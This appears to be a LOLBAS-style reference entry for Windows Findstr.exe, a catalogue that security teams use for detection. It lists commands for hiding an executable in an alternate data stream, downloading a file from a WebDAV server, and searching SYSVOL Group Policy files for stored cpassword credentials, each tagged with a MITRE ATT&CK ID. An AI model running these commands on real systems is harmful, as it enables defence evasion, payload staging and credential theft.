.. /Findstr.exe
Star

Write to ADS, discover, or download files with Findstr.exe


Paths:

Resources:
Acknowledgements:

Detection:

Alternate data streams

Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
findstr /V /L W3AllLov3LolBas c:\ADS\file.exe > c:\ADS\file.txt:file.exe
Usecase: Add a file to an alternate data stream to hide from defensive counter measures
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1564.004



Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1564.004



Credentials

Search for stored password in Group Policy files stored on SYSVOL.
findstr /S /I cpassword \\sysvol\policies\*.xml
Usecase: Find credentials stored in cpassword attrbute
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1552.001



Download

Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file.
findstr /V /L W3AllLov3LolBas \\webdavserver\folder\file.exe > c:\ADS\file.exe
Usecase: Download/Copy file from webdav server
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1105